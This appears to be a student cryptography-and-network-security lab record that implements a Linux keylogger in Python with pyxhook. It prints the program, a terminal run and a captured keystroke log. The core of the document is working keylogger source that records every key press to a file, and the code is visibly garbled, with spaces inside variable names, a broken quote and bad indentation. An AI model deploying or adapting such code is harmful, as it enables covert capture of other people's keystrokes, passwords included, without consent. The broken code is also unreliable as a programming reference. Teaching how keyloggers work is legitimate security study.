EXP NO: 4 DATE:

KEYLOGGERS

AIM:

To write a python program to implement key logger to record key strokes in Linux.

ALGORITHM:

- 1. Check if python-xlib is installed. If not type the command- dnf install python-xlib -y
- 2. Run pyxhook file using the command- python pyxhook.py
- 3. Create a file key.py
- 4. Run key.py to record all key strokes.
- 5. Open file.log file to view all the recorded key strokes.

PROGRAM:

```
import os
import pyxhook
log file = os.environ.get( 'pylogger file', os.path.expanduser('~/Desktop/file.log'))
cancel key = ord( os.environ.get( 'pylogger cancel', ''')[0])
if os.environ.get('pylogger clean', None) is not None:
       try:
               os.remove(log file)
       except EnvironmentError:
               pass
def OnKeyPress(event):
       with open(log file, 'a') as f:
               f.write('{}\n'.format(event.Key))
new hook = pyxhook.HookManager()
new hook.KeyDown = OnKeyPress
new hook.HookKeyboard()
try:
new hook.start() # start the hook
except KeyboardInterrupt:
                       pass
except Exception as ex:
       msg = 'Error while catching events:\n {}'.format(ex)
       pyxhook.print err(msg)
       with open(log file, 'a') as f:
               f.write('\n{}'.format(msg))
```

OUTPUT:

```
(kali@ kali)-[~/Documents/cnslab]
spython3 keylogger.py
Hello
CNS LAB
^Z
zsh: suspended python3 keylogger.py
```

File.log:

```
1 | Shift_L
2 | H
3 e
4 l
5 l
6 o
7 Return
8 Shift_L
9 M
10 e
11 BackSpace
13 BackSpace
15 Shift_L
16 C
17 N
18 S
19 space
20 Shift_L
21 L
22 Shift_L
22 Shift_L
23 A
24 B
28 Control_L
29 Return
30 Control_L
29 Return
30 Control_L
31 z
32
```

RESULT:

Thus, a python program is implemented to demonstrate key logger to record key strokes in Linux.